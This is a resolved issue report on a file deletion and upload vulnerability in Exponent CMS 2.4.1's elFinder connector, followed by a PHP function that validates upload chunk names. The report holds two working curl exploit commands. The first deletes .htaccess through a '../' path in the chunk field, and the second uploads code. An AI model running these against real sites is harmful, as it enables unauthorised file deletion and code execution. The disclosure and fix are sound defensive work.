#1404 ✓resolved
mm

Exponent CMS 2.4.1 - Unrestricted File Deletion / Upload Vulnerability in elFinder

Reported by mm | January 10th, 2017 @ 04:52 PM | in 2.4.2 (closed)

Allows deleting arbitrary files and thus bypassing .htaccess restrictions on uploadable executable PHP files due to a flaw in external/elFinder/php/elFinder.class.php

Example:
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=" -F chunk="../[exponent]/files/.htaccess"

curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=@[remote code]"
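
The first request above passes a relative path in the `chunk` field. As an added illustration (not Exponent CMS or elFinder code; `safe_chunk_path`, the character whitelist and the temp-directory layout are assumptions), this is a server-side check that refuses chunk names able to resolve outside the intended directory:

```php
<?php
// Added illustration; not Exponent CMS or elFinder code.
// Function name, whitelist and directory layout are hypothetical.

/**
 * Map a client-supplied chunk name to a path inside $tmpDir,
 * or return null when the name could reach outside it.
 */
function safe_chunk_path(string $tmpDir, string $chunk): ?string
{
    // Whitelist: no slash, backslash or NUL can pass. \A and \z are used
    // because "$" would also accept a trailing newline.
    if (!preg_match('/\A[A-Za-z0-9._ -]{1,255}\z/', $chunk)) {
        return null;
    }
    // Dot names are valid under the whitelist but are directory references.
    if ($chunk === '.' || $chunk === '..') {
        return null;
    }
    $base = realpath($tmpDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    $path = $base . DIRECTORY_SEPARATOR . $chunk;
    // An existing entry must resolve to a direct child of $base, which
    // rules out a symlink planted there that points somewhere else.
    if (file_exists($path) || is_link($path)) {
        $real = realpath($path);
        if ($real === false || dirname($real) !== $base) {
            return null;
        }
    }
    return $path;
}

// Constructed sample inputs, including the traversal shape from the report.
$samples = ['photo.jpg.0_3.part', '../site/files/.htaccess', '..', "a\0b", 'dir\\x', "x.part\n"];
foreach ($samples as $name) {
    $verdict = safe_chunk_path(sys_get_temp_dir(), $name) === null ? 'rejected' : 'accepted';
    printf("%-28s => %s\n", json_encode($name), $verdict);
}
```

Only the first sample is accepted. Any later delete or rename of chunk files should operate on the returned path, never on the raw request value.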
